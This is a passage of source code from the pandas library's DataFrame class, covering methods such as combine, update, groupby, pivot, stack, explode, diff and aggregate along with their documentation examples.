1 NaN 3.0 -10.0
2 NaN 3.0 1.0
>>> df1.combine(df2, take_smaller, overwrite=False)
A B C
0 0.0 NaN NaN
1 0.0 3.0 -10.0
2 NaN 3.0 1.0
Demonstrating the preference of the passed in dataframe.
>>> df2 = pd.DataFrame({'B': [3, 3], 'C': [1, 1], }, index=[1, 2])
>>> df2.combine(df1, take_smaller)
A B C
0 0.0 NaN NaN
1 0.0 3.0 NaN
2 NaN 3.0 NaN
>>> df2.combine(df1, take_smaller, overwrite=False)
A B C
0 0.0 NaN NaN
1 0.0 3.0 1.0
2 NaN 3.0 1.0
"""
other_idxlen = len(other.index) # save for compare
this, other = self.align(other, copy=False)
new_index = this.index
if other.empty and len(new_index) == len(self.index):
return self.copy()
if self.empty and len(other) == other_idxlen:
return other.copy()
# sorts if possible
new_columns = this.columns.union(other.columns)
do_fill = fill_value is not None
result = {}
for col in new_columns:
series = this[col]
otherSeries = other[col]
this_dtype = series.dtype
other_dtype = otherSeries.dtype
this_mask = isna(series)
other_mask = isna(otherSeries)
# don't overwrite columns unnecessarily
# DO propagate if this column is not in the intersection
if not overwrite and other_mask.all():
result[col] = this[col].copy()
continue
if do_fill:
series = series.copy()
otherSeries = otherSeries.copy()
series[this_mask] = fill_value
otherSeries[other_mask] = fill_value
if col not in self.columns:
# If self DataFrame does not have col in other DataFrame,
# try to promote series, which is all NaN, as other_dtype.
new_dtype = other_dtype
try:
series = series.astype(new_dtype, copy=False)
except ValueError:
# e.g. new_dtype is integer types
pass
else:
# if we have different dtypes, possibly promote
new_dtype = find_common_type([this_dtype, other_dtype])
if not is_dtype_equal(this_dtype, new_dtype):
series = series.astype(new_dtype)
if not is_dtype_equal(other_dtype, new_dtype):
otherSeries = otherSeries.astype(new_dtype)
arr = func(series, otherSeries)
arr = maybe_downcast_to_dtype(arr, this_dtype)
result[col] = arr
# convert_objects just in case
return self._constructor(result, index=new_index, columns=new_columns)
def combine_first(self, other: DataFrame) -> DataFrame:
"""
Update null elements with value in the same location in `other`.
Combine two DataFrame objects by filling null values in one DataFrame
with non-null values from other DataFrame. The row and column indexes
of the resulting DataFrame will be the union of the two.
Parameters
----------
other : DataFrame
Provided DataFrame to use to fill null values.
Returns
-------
DataFrame
See Also
--------
DataFrame.combine : Perform series-wise operation on two DataFrames
using a given function.
Examples
--------
>>> df1 = pd.DataFrame({'A': [None, 0], 'B': [None, 4]})
>>> df2 = pd.DataFrame({'A': [1, 1], 'B': [3, 3]})
>>> df1.combine_first(df2)
A B
0 1.0 3.0
1 0.0 4.0
Null values still persist if the location of that null value
does not exist in `other`
>>> df1 = pd.DataFrame({'A': [None, 0], 'B': [4, None]})
>>> df2 = pd.DataFrame({'B': [3, 3], 'C': [1, 1]}, index=[1, 2])
>>> df1.combine_first(df2)
A B C
0 NaN 4.0 NaN
1 0.0 3.0 1.0
2 NaN 3.0 1.0
"""
import pandas.core.computation.expressions as expressions
def extract_values(arr):
# Does two things:
# 1. maybe gets the values from the Series / Index
# 2. convert datelike to i8
# TODO: extract_array?
if isinstance(arr, (Index, Series)):
arr = arr._values
if needs_i8_conversion(arr.dtype):
if is_extension_array_dtype(arr.dtype):
arr = arr.asi8
else:
arr = arr.view("i8")
return arr
def combiner(x, y):
mask = isna(x)
# TODO: extract_array?
if isinstance(mask, (Index, Series)):
mask = mask._values
x_values = extract_values(x)
y_values = extract_values(y)
# If the column y in other DataFrame is not in first DataFrame,
# just return y_values.
if y.name not in self.columns:
return y_values
return expressions.where(mask, y_values, x_values)
return self.combine(other, combiner, overwrite=False)
def update(
self, other, join="left", overwrite=True, filter_func=None, errors="ignore"
) -> None:
"""
Modify in place using non-NA values from another DataFrame.
Aligns on indices. There is no return value.
Parameters
----------
other : DataFrame, or object coercible into a DataFrame
Should have at least one matching index/column label
with the original DataFrame. If a Series is passed,
its name attribute must be set, and that will be
used as the column name to align with the original DataFrame.
join : {'left'}, default 'left'
Only left join is implemented, keeping the index and columns of the
original object.
overwrite : bool, default True
How to handle non-NA values for overlapping keys:
* True: overwrite original DataFrame's values
with values from `other`.
* False: only update values that are NA in
the original DataFrame.
filter_func : callable(1d-array) -> bool 1d-array, optional
Can choose to replace values other than NA. Return True for values
that should be updated.
errors : {'raise', 'ignore'}, default 'ignore'
If 'raise', will raise a ValueError if the DataFrame and `other`
both contain non-NA data in the same place.
.. versionchanged:: 0.24.0
Changed from `raise_conflict=False|True`
to `errors='ignore'|'raise'`.
Returns
-------
None : method directly changes calling object
Raises
------
ValueError
* When `errors='raise'` and there's overlapping non-NA data.
* When `errors` is not either `'ignore'` or `'raise'`
NotImplementedError
* If `join != 'left'`
See Also
--------
dict.update : Similar method for dictionaries.
DataFrame.merge : For column(s)-on-columns(s) operations.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3],
... 'B': [400, 500, 600]})
>>> new_df = pd.DataFrame({'B': [4, 5, 6],
... 'C': [7, 8, 9]})
>>> df.update(new_df)
>>> df
A B
0 1 4
1 2 5
2 3 6
The DataFrame's length does not increase as a result of the update,
only values at matching index/column labels are updated.
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_df = pd.DataFrame({'B': ['d', 'e', 'f', 'g', 'h', 'i']})
>>> df.update(new_df)
>>> df
A B
0 a d
1 b e
2 c f
For Series, it's name attribute must be set.
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_column = pd.Series(['d', 'e'], name='B', index=[0, 2])
>>> df.update(new_column)
>>> df
A B
0 a d
1 b y
2 c e
>>> df = pd.DataFrame({'A': ['a', 'b', 'c'],
... 'B': ['x', 'y', 'z']})
>>> new_df = pd.DataFrame({'B': ['d', 'e']}, index=[1, 2])
>>> df.update(new_df)
>>> df
A B
0 a x
1 b d
2 c e
If `other` contains NaNs the corresponding values are not updated
in the original dataframe.
>>> df = pd.DataFrame({'A': [1, 2, 3],
... 'B': [400, 500, 600]})
>>> new_df = pd.DataFrame({'B': [4, np.nan, 6]})
>>> df.update(new_df)
>>> df
A B
0 1 4.0
1 2 500.0
2 3 6.0
"""
import pandas.core.computation.expressions as expressions
# TODO: Support other joins
if join != "left": # pragma: no cover
raise NotImplementedError("Only left join is supported")
if errors not in ["ignore", "raise"]:
raise ValueError("The parameter errors must be either 'ignore' or 'raise'")
if not isinstance(other, DataFrame):
other = DataFrame(other)
other = other.reindex_like(self)
for col in self.columns:
this = self[col]._values
that = other[col]._values
if filter_func is not None:
with np.errstate(all="ignore"):
mask = ~filter_func(this) | isna(that)
else:
if errors == "raise":
mask_this = notna(that)
mask_that = notna(this)
if any(mask_this & mask_that):
raise ValueError("Data overlaps.")
if overwrite:
mask = isna(that)
else:
mask = notna(this)
# don't overwrite columns unnecessarily
if mask.all():
continue
self[col] = expressions.where(mask, this, that)
# ----------------------------------------------------------------------
# Data reshaping
@Appender(
"""
Examples
--------
>>> df = pd.DataFrame({'Animal': ['Falcon', 'Falcon',
... 'Parrot', 'Parrot'],
... 'Max Speed': [380., 370., 24., 26.]})
>>> df
Animal Max Speed
0 Falcon 380.0
1 Falcon 370.0
2 Parrot 24.0
3 Parrot 26.0
>>> df.groupby(['Animal']).mean()
Max Speed
Animal
Falcon 375.0
Parrot 25.0
**Hierarchical Indexes**
We can groupby different levels of a hierarchical index
using the `level` parameter:
>>> arrays = [['Falcon', 'Falcon', 'Parrot', 'Parrot'],
... ['Captive', 'Wild', 'Captive', 'Wild']]
>>> index = pd.MultiIndex.from_arrays(arrays, names=('Animal', 'Type'))
>>> df = pd.DataFrame({'Max Speed': [390., 350., 30., 20.]},
... index=index)
>>> df
Max Speed
Animal Type
Falcon Captive 390.0
Wild 350.0
Parrot Captive 30.0
Wild 20.0
>>> df.groupby(level=0).mean()
Max Speed
Animal
Falcon 370.0
Parrot 25.0
>>> df.groupby(level="Type").mean()
Max Speed
Type
Captive 210.0
Wild 185.0
We can also choose to include NA in group keys or not by setting
`dropna` parameter, the default setting is `True`:
>>> l = [[1, 2, 3], [1, None, 4], [2, 1, 3], [1, 2, 2]]
>>> df = pd.DataFrame(l, columns=["a", "b", "c"])
>>> df.groupby(by=["b"]).sum()
a c
b
1.0 2 3
2.0 2 5
>>> df.groupby(by=["b"], dropna=False).sum()
a c
b
1.0 2 3
2.0 2 5
NaN 1 4
>>> l = [["a", 12, 12], [None, 12.3, 33.], ["b", 12.3, 123], ["a", 1, 1]]
>>> df = pd.DataFrame(l, columns=["a", "b", "c"])
>>> df.groupby(by="a").sum()
b c
a
a 13.0 13.0
b 12.3 123.0
>>> df.groupby(by="a", dropna=False).sum()
b c
a
a 13.0 13.0
b 12.3 123.0
NaN 12.3 33.0
"""
)
@Appender(_shared_docs["groupby"] % _shared_doc_kwargs)
def groupby(
self,
by=None,
axis=0,
level=None,
as_index: bool = True,
sort: bool = True,
group_keys: bool = True,
squeeze: bool = no_default,
observed: bool = False,
dropna: bool = True,
) -> DataFrameGroupBy:
from pandas.core.groupby.generic import DataFrameGroupBy
if squeeze is not no_default:
warnings.warn(
(
"The `squeeze` parameter is deprecated and "
"will be removed in a future version."
),
FutureWarning,
stacklevel=2,
)
else:
squeeze = False
if level is None and by is None:
raise TypeError("You have to supply one of 'by' and 'level'")
axis = self._get_axis_number(axis)
return DataFrameGroupBy(
obj=self,
keys=by,
axis=axis,
level=level,
as_index=as_index,
sort=sort,
group_keys=group_keys,
squeeze=squeeze,
observed=observed,
dropna=dropna,
)
_shared_docs[
"pivot"
] = """
Return reshaped DataFrame organized by given index / column values.
Reshape data (produce a "pivot" table) based on column values. Uses
unique values from specified `index` / `columns` to form axes of the
resulting DataFrame. This function does not support data
aggregation, multiple values will result in a MultiIndex in the
columns. See the :ref:`User Guide <reshaping>` for more on reshaping.
Parameters
----------%s
index : str or object or a list of str, optional
Column to use to make new frame's index. If None, uses
existing index.
.. versionchanged:: 1.1.0
Also accept list of index names.
columns : str or object or a list of str
Column to use to make new frame's columns.
.. versionchanged:: 1.1.0
Also accept list of columns names.
values : str, object or a list of the previous, optional
Column(s) to use for populating new frame's values. If not
specified, all remaining columns will be used and the result will
have hierarchically indexed columns.
Returns
-------
DataFrame
Returns reshaped DataFrame.
Raises
------
ValueError:
When there are any `index`, `columns` combinations with multiple
values. `DataFrame.pivot_table` when you need to aggregate.
See Also
--------
DataFrame.pivot_table : Generalization of pivot that can handle
duplicate values for one index/column pair.
DataFrame.unstack : Pivot based on the index values instead of a
column.
wide_to_long : Wide panel to long format. Less flexible but more
user-friendly than melt.
Notes
-----
For finer-tuned control, see hierarchical indexing documentation along
with the related stack/unstack methods.
Examples
--------
>>> df = pd.DataFrame({'foo': ['one', 'one', 'one', 'two', 'two',
... 'two'],
... 'bar': ['A', 'B', 'C', 'A', 'B', 'C'],
... 'baz': [1, 2, 3, 4, 5, 6],
... 'zoo': ['x', 'y', 'z', 'q', 'w', 't']})
>>> df
foo bar baz zoo
0 one A 1 x
1 one B 2 y
2 one C 3 z
3 two A 4 q
4 two B 5 w
5 two C 6 t
>>> df.pivot(index='foo', columns='bar', values='baz')
bar A B C
foo
one 1 2 3
two 4 5 6
>>> df.pivot(index='foo', columns='bar')['baz']
bar A B C
foo
one 1 2 3
two 4 5 6
>>> df.pivot(index='foo', columns='bar', values=['baz', 'zoo'])
baz zoo
bar A B C A B C
foo
one 1 2 3 x y z
two 4 5 6 q w t
You could also assign a list of column names or a list of index names.
>>> df = pd.DataFrame({
... "lev1": [1, 1, 1, 2, 2, 2],
... "lev2": [1, 1, 2, 1, 1, 2],
... "lev3": [1, 2, 1, 2, 1, 2],
... "lev4": [1, 2, 3, 4, 5, 6],
... "values": [0, 1, 2, 3, 4, 5]})
>>> df
lev1 lev2 lev3 lev4 values
0 1 1 1 1 0
1 1 1 2 2 1
2 1 2 1 3 2
3 2 1 2 4 3
4 2 1 1 5 4
5 2 2 2 6 5
>>> df.pivot(index="lev1", columns=["lev2", "lev3"],values="values")
lev2 1 2
lev3 1 2 1 2
lev1
1 0.0 1.0 2.0 NaN
2 4.0 3.0 NaN 5.0
>>> df.pivot(index=["lev1", "lev2"], columns=["lev3"],values="values")
lev3 1 2
lev1 lev2
1 1 0.0 1.0
2 2.0 NaN
2 1 4.0 3.0
2 NaN 5.0
A ValueError is raised if there are any duplicates.
>>> df = pd.DataFrame({"foo": ['one', 'one', 'two', 'two'],
... "bar": ['A', 'A', 'B', 'C'],
... "baz": [1, 2, 3, 4]})
>>> df
foo bar baz
0 one A 1
1 one A 2
2 two B 3
3 two C 4
Notice that the first two rows are the same for our `index`
and `columns` arguments.
>>> df.pivot(index='foo', columns='bar', values='baz')
Traceback (most recent call last):
...
ValueError: Index contains duplicate entries, cannot reshape
"""
@Substitution("")
@Appender(_shared_docs["pivot"])
def pivot(self, index=None, columns=None, values=None) -> DataFrame:
from pandas.core.reshape.pivot import pivot
return pivot(self, index=index, columns=columns, values=values)
_shared_docs[
"pivot_table"
] = """
Create a spreadsheet-style pivot table as a DataFrame.
The levels in the pivot table will be stored in MultiIndex objects
(hierarchical indexes) on the index and columns of the result DataFrame.
Parameters
----------%s
values : column to aggregate, optional
index : column, Grouper, array, or list of the previous
If an array is passed, it must be the same length as the data. The
list can contain any of the other types (except list).
Keys to group by on the pivot table index. If an array is passed,
it is being used as the same manner as column values.
columns : column, Grouper, array, or list of the previous
If an array is passed, it must be the same length as the data. The
list can contain any of the other types (except list).
Keys to group by on the pivot table column. If an array is passed,
it is being used as the same manner as column values.
aggfunc : function, list of functions, dict, default numpy.mean
If list of functions passed, the resulting pivot table will have
hierarchical columns whose top level are the function names
(inferred from the function objects themselves)
If dict is passed, the key is column to aggregate and value
is function or list of functions.
fill_value : scalar, default None
Value to replace missing values with (in the resulting pivot table,
after aggregation).
margins : bool, default False
Add all row / columns (e.g. for subtotal / grand totals).
dropna : bool, default True
Do not include columns whose entries are all NaN.
margins_name : str, default 'All'
Name of the row / column that will contain the totals
when margins is True.
observed : bool, default False
This only applies if any of the groupers are Categoricals.
If True: only show observed values for categorical groupers.
If False: show all values for categorical groupers.
.. versionchanged:: 0.25.0
Returns
-------
DataFrame
An Excel style pivot table.
See Also
--------
DataFrame.pivot : Pivot without aggregation that can handle
non-numeric data.
DataFrame.melt: Unpivot a DataFrame from wide to long format,
optionally leaving identifiers set.
wide_to_long : Wide panel to long format. Less flexible but more
user-friendly than melt.
Examples
--------
>>> df = pd.DataFrame({"A": ["foo", "foo", "foo", "foo", "foo",
... "bar", "bar", "bar", "bar"],
... "B": ["one", "one", "one", "two", "two",
... "one", "one", "two", "two"],
... "C": ["small", "large", "large", "small",
... "small", "large", "small", "small",
... "large"],
... "D": [1, 2, 2, 3, 3, 4, 5, 6, 7],
... "E": [2, 4, 5, 5, 6, 6, 8, 9, 9]})
>>> df
A B C D E
0 foo one small 1 2
1 foo one large 2 4
2 foo one large 2 5
3 foo two small 3 5
4 foo two small 3 6
5 bar one large 4 6
6 bar one small 5 8
7 bar two small 6 9
8 bar two large 7 9
This first example aggregates values by taking the sum.
>>> table = pd.pivot_table(df, values='D', index=['A', 'B'],
... columns=['C'], aggfunc=np.sum)
>>> table
C large small
A B
bar one 4.0 5.0
two 7.0 6.0
foo one 4.0 1.0
two NaN 6.0
We can also fill missing values using the `fill_value` parameter.
>>> table = pd.pivot_table(df, values='D', index=['A', 'B'],
... columns=['C'], aggfunc=np.sum, fill_value=0)
>>> table
C large small
A B
bar one 4 5
two 7 6
foo one 4 1
two 0 6
The next example aggregates by taking the mean across multiple columns.
>>> table = pd.pivot_table(df, values=['D', 'E'], index=['A', 'C'],
... aggfunc={'D': np.mean,
... 'E': np.mean})
>>> table
D E
A C
bar large 5.500000 7.500000
small 5.500000 8.500000
foo large 2.000000 4.500000
small 2.333333 4.333333
We can also calculate multiple types of aggregations for any given
value column.
>>> table = pd.pivot_table(df, values=['D', 'E'], index=['A', 'C'],
... aggfunc={'D': np.mean,
... 'E': [min, max, np.mean]})
>>> table
D E
mean max mean min
A C
bar large 5.500000 9.0 7.500000 6.0
small 5.500000 9.0 8.500000 8.0
foo large 2.000000 5.0 4.500000 4.0
small 2.333333 6.0 4.333333 2.0
"""
@Substitution("")
@Appender(_shared_docs["pivot_table"])
def pivot_table(
self,
values=None,
index=None,
columns=None,
aggfunc="mean",
fill_value=None,
margins=False,
dropna=True,
margins_name="All",
observed=False,
) -> DataFrame:
from pandas.core.reshape.pivot import pivot_table
return pivot_table(
self,
values=values,
index=index,
columns=columns,
aggfunc=aggfunc,
fill_value=fill_value,
margins=margins,
dropna=dropna,
margins_name=margins_name,
observed=observed,
)
def stack(self, level=-1, dropna=True):
"""
Stack the prescribed level(s) from columns to index.
Return a reshaped DataFrame or Series having a multi-level
index with one or more new inner-most levels compared to the current
DataFrame. The new inner-most levels are created by pivoting the
columns of the current dataframe:
- if the columns have a single level, the output is a Series;
- if the columns have multiple levels, the new index
level(s) is (are) taken from the prescribed level(s) and
the output is a DataFrame.
Parameters
----------
level : int, str, list, default -1
Level(s) to stack from the column axis onto the index
axis, defined as one index or label, or a list of indices
or labels.
dropna : bool, default True
Whether to drop rows in the resulting Frame/Series with
missing values. Stacking a column level onto the index
axis can create combinations of index and column values
that are missing from the original dataframe. See Examples
section.
Returns
-------
DataFrame or Series
Stacked dataframe or series.
See Also
--------
DataFrame.unstack : Unstack prescribed level(s) from index axis
onto column axis.
DataFrame.pivot : Reshape dataframe from long format to wide
format.
DataFrame.pivot_table : Create a spreadsheet-style pivot table
as a DataFrame.
Notes
-----
The function is named by analogy with a collection of books
being reorganized from being side by side on a horizontal
position (the columns of the dataframe) to being stacked
vertically on top of each other (in the index of the
dataframe).
Examples
--------
**Single level columns**
>>> df_single_level_cols = pd.DataFrame([[0, 1], [2, 3]],
... index=['cat', 'dog'],
... columns=['weight', 'height'])
Stacking a dataframe with a single level column axis returns a Series:
>>> df_single_level_cols
weight height
cat 0 1
dog 2 3
>>> df_single_level_cols.stack()
cat weight 0
height 1
dog weight 2
height 3
dtype: int64
**Multi level columns: simple case**
>>> multicol1 = pd.MultiIndex.from_tuples([('weight', 'kg'),
... ('weight', 'pounds')])
>>> df_multi_level_cols1 = pd.DataFrame([[1, 2], [2, 4]],
... index=['cat', 'dog'],
... columns=multicol1)
Stacking a dataframe with a multi-level column axis:
>>> df_multi_level_cols1
weight
kg pounds
cat 1 2
dog 2 4
>>> df_multi_level_cols1.stack()
weight
cat kg 1
pounds 2
dog kg 2
pounds 4
**Missing values**
>>> multicol2 = pd.MultiIndex.from_tuples([('weight', 'kg'),
... ('height', 'm')])
>>> df_multi_level_cols2 = pd.DataFrame([[1.0, 2.0], [3.0, 4.0]],
... index=['cat', 'dog'],
... columns=multicol2)
It is common to have missing values when stacking a dataframe
with multi-level columns, as the stacked dataframe typically
has more values than the original dataframe. Missing values
are filled with NaNs:
>>> df_multi_level_cols2
weight height
kg m
cat 1.0 2.0
dog 3.0 4.0
>>> df_multi_level_cols2.stack()
height weight
cat kg NaN 1.0
m 2.0 NaN
dog kg NaN 3.0
m 4.0 NaN
**Prescribing the level(s) to be stacked**
The first parameter controls which level or levels are stacked:
>>> df_multi_level_cols2.stack(0)
kg m
cat height NaN 2.0
weight 1.0 NaN
dog height NaN 4.0
weight 3.0 NaN
>>> df_multi_level_cols2.stack([0, 1])
cat height m 2.0
weight kg 1.0
dog height m 4.0
weight kg 3.0
dtype: float64
**Dropping missing values**
>>> df_multi_level_cols3 = pd.DataFrame([[None, 1.0], [2.0, 3.0]],
... index=['cat', 'dog'],
... columns=multicol2)
Note that rows where all values are missing are dropped by
default but this behaviour can be controlled via the dropna
keyword parameter:
>>> df_multi_level_cols3
weight height
kg m
cat NaN 1.0
dog 2.0 3.0
>>> df_multi_level_cols3.stack(dropna=False)
height weight
cat kg NaN NaN
m 1.0 NaN
dog kg NaN 2.0
m 3.0 NaN
>>> df_multi_level_cols3.stack(dropna=True)
height weight
cat m 1.0 NaN
dog kg NaN 2.0
m 3.0 NaN
"""
from pandas.core.reshape.reshape import stack, stack_multiple
if isinstance(level, (tuple, list)):
return stack_multiple(self, level, dropna=dropna)
else:
return stack(self, level, dropna=dropna)
def explode(
self, column: Union[str, Tuple], ignore_index: bool = False
) -> DataFrame:
"""
Transform each element of a list-like to a row, replicating index values.
.. versionadded:: 0.25.0
Parameters
----------
column : str or tuple
Column to explode.
ignore_index : bool, default False
If True, the resulting index will be labeled 0, 1, …, n - 1.
.. versionadded:: 1.1.0
Returns
-------
DataFrame
Exploded lists to rows of the subset columns;
index will be duplicated for these rows.
Raises
------
ValueError :
if columns of the frame are not unique.
See Also
--------
DataFrame.unstack : Pivot a level of the (necessarily hierarchical)
index labels.
DataFrame.melt : Unpivot a DataFrame from wide format to long format.
Series.explode : Explode a DataFrame from list-like columns to long format.
Notes
-----
This routine will explode list-likes including lists, tuples, sets,
Series, and np.ndarray. The result dtype of the subset rows will
be object. Scalars will be returned unchanged, and empty list-likes will
result in a np.nan for that row. In addition, the ordering of rows in the
output will be non-deterministic when exploding sets.
Examples
--------
>>> df = pd.DataFrame({'A': [[1, 2, 3], 'foo', [], [3, 4]], 'B': 1})
>>> df
A B
0 [1, 2, 3] 1
1 foo 1
2 [] 1
3 [3, 4] 1
>>> df.explode('A')
A B
0 1 1
0 2 1
0 3 1
1 foo 1
2 NaN 1
3 3 1
3 4 1
"""
if not (is_scalar(column) or isinstance(column, tuple)):
raise ValueError("column must be a scalar")
if not self.columns.is_unique:
raise ValueError("columns must be unique")
df = self.reset_index(drop=True)
# TODO: use overload to refine return type of reset_index
assert df is not None # needed for mypy
result = df[column].explode()
result = df.drop([column], axis=1).join(result)
if ignore_index:
result.index = ibase.default_index(len(result))
else:
result.index = self.index.take(result.index)
result = result.reindex(columns=self.columns, copy=False)
return result
def unstack(self, level=-1, fill_value=None):
"""
Pivot a level of the (necessarily hierarchical) index labels.
Returns a DataFrame having a new level of column labels whose inner-most level
consists of the pivoted index labels.
If the index is not a MultiIndex, the output will be a Series
(the analogue of stack when the columns are not a MultiIndex).
Parameters
----------
level : int, str, or list of these, default -1 (last level)
Level(s) of index to unstack, can pass level name.
fill_value : int, str or dict
Replace NaN with this value if the unstack produces missing values.
Returns
-------
Series or DataFrame
See Also
--------
DataFrame.pivot : Pivot a table based on column values.
DataFrame.stack : Pivot a level of the column labels (inverse operation
from `unstack`).
Examples
--------
>>> index = pd.MultiIndex.from_tuples([('one', 'a'), ('one', 'b'),
... ('two', 'a'), ('two', 'b')])
>>> s = pd.Series(np.arange(1.0, 5.0), index=index)
>>> s
one a 1.0
b 2.0
two a 3.0
b 4.0
dtype: float64
>>> s.unstack(level=-1)
a b
one 1.0 2.0
two 3.0 4.0
>>> s.unstack(level=0)
one two
a 1.0 3.0
b 2.0 4.0
>>> df = s.unstack(level=0)
>>> df.unstack()
one a 1.0
b 2.0
two a 3.0
b 4.0
dtype: float64
"""
from pandas.core.reshape.reshape import unstack
return unstack(self, level, fill_value)
@Appender(_shared_docs["melt"] % dict(caller="df.melt(", other="melt"))
def melt(
self,
id_vars=None,
value_vars=None,
var_name=None,
value_name="value",
col_level=None,
ignore_index=True,
) -> DataFrame:
return melt(
self,
id_vars=id_vars,
value_vars=value_vars,
var_name=var_name,
value_name=value_name,
col_level=col_level,
ignore_index=ignore_index,
)
# ----------------------------------------------------------------------
# Time series-related
@doc(
Series.diff,
klass="Dataframe",
extra_params="axis : {0 or 'index', 1 or 'columns'}, default 0\n "
"Take difference over rows (0) or columns (1).\n",
other_klass="Series",
examples=dedent(
"""
Difference with previous row
>>> df = pd.DataFrame({'a': [1, 2, 3, 4, 5, 6],
... 'b': [1, 1, 2, 3, 5, 8],
... 'c': [1, 4, 9, 16, 25, 36]})
>>> df
a b c
0 1 1 1
1 2 1 4
2 3 2 9
3 4 3 16
4 5 5 25
5 6 8 36
>>> df.diff()
a b c
0 NaN NaN NaN
1 1.0 0.0 3.0
2 1.0 1.0 5.0
3 1.0 1.0 7.0
4 1.0 2.0 9.0
5 1.0 3.0 11.0
Difference with previous column
>>> df.diff(axis=1)
a b c
0 NaN 0 0
1 NaN -1 3
2 NaN -1 7
3 NaN -1 13
4 NaN 0 20
5 NaN 2 28
Difference with 3rd previous row
>>> df.diff(periods=3)
a b c
0 NaN NaN NaN
1 NaN NaN NaN
2 NaN NaN NaN
3 3.0 2.0 15.0
4 3.0 4.0 21.0
5 3.0 6.0 27.0
Difference with following row
>>> df.diff(periods=-1)
a b c
0 -1.0 0.0 -3.0
1 -1.0 -1.0 -5.0
2 -1.0 -1.0 -7.0
3 -1.0 -2.0 -9.0
4 -1.0 -3.0 -11.0
5 NaN NaN NaN
Overflow in input dtype
>>> df = pd.DataFrame({'a': [1, 0]}, dtype=np.uint8)
>>> df.diff()
a
0 NaN
1 255.0"""
),
)
def diff(self, periods: int = 1, axis: Axis = 0) -> DataFrame:
if not isinstance(periods, int):
if not (is_float(periods) and periods.is_integer()):
raise ValueError("periods must be an integer")
periods = int(periods)
bm_axis = self._get_block_manager_axis(axis)
if bm_axis == 0 and periods != 0:
return self - self.shift(periods, axis=axis) # type: ignore[operator]
new_data = self._mgr.diff(n=periods, axis=bm_axis)
return self._constructor(new_data)
# ----------------------------------------------------------------------
# Function application
def _gotitem(
self,
key: Union[Label, List[Label]],
ndim: int,
subset: Optional[FrameOrSeriesUnion] = None,
) -> FrameOrSeriesUnion:
"""
Sub-classes to define. Return a sliced object.
Parameters
----------
key : string / list of selections
ndim : 1,2
requested ndim of result
subset : object, default None
subset to act on
"""
if subset is None:
subset = self
elif subset.ndim == 1: # is Series
return subset
# TODO: _shallow_copy(subset)?
return subset[key]
_agg_summary_and_see_also_doc = dedent(
"""
The aggregation operations are always performed over an axis, either the
index (default) or the column axis. This behavior is different from
`numpy` aggregation functions (`mean`, `median`, `prod`, `sum`, `std`,
`var`), where the default is to compute the aggregation of the flattened
array, e.g., ``numpy.mean(arr_2d)`` as opposed to
``numpy.mean(arr_2d, axis=0)``.
`agg` is an alias for `aggregate`. Use the alias.
See Also
--------
DataFrame.apply : Perform any type of operations.
DataFrame.transform : Perform transformation type operations.
core.groupby.GroupBy : Perform operations over groups.
core.resample.Resampler : Perform operations over resampled bins.
core.window.Rolling : Perform operations over rolling window.
core.window.Expanding : Perform operations over expanding window.
core.window.ExponentialMovingWindow : Perform operation over exponential weighted
window.
"""
)
_agg_examples_doc = dedent(
"""
Examples
--------
>>> df = pd.DataFrame([[1, 2, 3],
... [4, 5, 6],
... [7, 8, 9],
... [np.nan, np.nan, np.nan]],
... columns=['A', 'B', 'C'])
Aggregate these functions over the rows.
>>> df.agg(['sum', 'min'])
A B C
sum 12.0 15.0 18.0
min 1.0 2.0 3.0
Different aggregations per column.
>>> df.agg({'A' : ['sum', 'min'], 'B' : ['min', 'max']})
A B
max NaN 8.0
min 1.0 2.0
sum 12.0 NaN
Aggregate different functions over the columns and rename the index of the resulting
DataFrame.
>>> df.agg(x=('A', max), y=('B', 'min'), z=('C', np.mean))
A B C
x 7.0 NaN NaN
y NaN 2.0 NaN
z NaN NaN 6.0
Aggregate over the columns.
>>> df.agg("mean", axis="columns")
0 2.0
1 5.0
2 8.0
3 NaN
dtype: float64
"""
)
@doc(
_shared_docs["aggregate"],
klass=_shared_doc_kwargs["klass"],
axis=_shared_doc_kwargs["axis"],
see_also=_agg_summary_and_see_also_doc,
examples=_agg_examples_doc,
)
def aggregate(self, func=None, axis=0, *args, **kwargs):
axis = self._get_axis_number(axis)
relabeling, func, columns, order = reconstruct_func(func, **kwargs)
result = None
try:
result, how = self._aggregate(func, axis, *args, **kwargs)
except TypeError as err:
exc = TypeError(
"DataFrame constructor called with "
f"incompatible data and dtype: {err}"
)
raise exc from err
if result is None:
return self.apply(func, axis=axis, args=args, **kwargs)
if relabeling:
# This is to keep the order to columns occurrence unchanged, and also
# keep the order of new columns occurrence unchanged
# For the return values of reconstruct_func, if relabeling is
# False, columns and order will be None.
assert columns is not None
assert order is not None
result_in_dict = relabel_result(result, func, columns, order)
result = DataFrame(result_in_dict, index=columns)
return result
def _aggregate(self, arg, axis=0, *args, **kwargs):
if axis == 1:
# NDFrame.aggregate returns a tuple, and we need to transpose
# only result
result, how = aggregate(self.T, arg, *args, **kwargs)
result = result.T if result is not None else result
return result, how
return aggregate(self, arg, *args, **kwargs)
agg = aggregate
@doc(
_shared_docs["transform"],
klass=_shared_doc_kwargs["klass"],
axis=_shared_doc_kwargs["axis"],
)
def transform(
self, func: AggFuncType, axis: Axis = 0, *args, **kwargs
) -> DataFrame:
result = transform(self, func, axis, *args, **kwargs)
assert isinstance(result, DataFrame)
return result
def apply(self, func, axis=0, raw=False, result_type=None, args=(), **kwds):
"""
Apply a function along an axis of the DataFrame.
Objects passed to the function are Series objects whose index is
either the DataFrame's index (``axis=0``) or the DataFrame's columns
(``axis=1``). By default (``result_type=None``), the final return type
is inferred from the return type of the applied function. Otherwise,
it depends on the `result_type` argument.
Parameters
----------
func : function
Function to apply to each column or row.
axis : {0 or 'index', 1 or 'columns'}, default 0
Axis along which the function is applied:
* 0 or 'index': apply function to each column.
* 1 or 'columns': apply function to each row.
raw : bool, default False
Determines if row or column is passed as a Series or ndarray object:
* ``False`` : passes each row or column as a Series to the
function.
* ``True`` : the passed function will receive ndarray objects
instead.
If you are just applying a NumPy reduction function this will
achieve much better performance.
result_type : {'expand', 'reduce', 'broadcast', None}, default None
These only act when ``axis=1`` (columns):
* 'expand' : list-like results will be turned into columns.
* 'reduce' : returns a Series if possible rather than expanding
list-like results. This is the opposite of 'expand'.
* 'broadcast' : results will be broadcast to the original shape
of the DataFrame, the original index and columns will be
retained.
The default behaviour (None) depends on the return value of the
applied function: list-like results will be returned as a Series
of those. However if the apply function returns a Series these
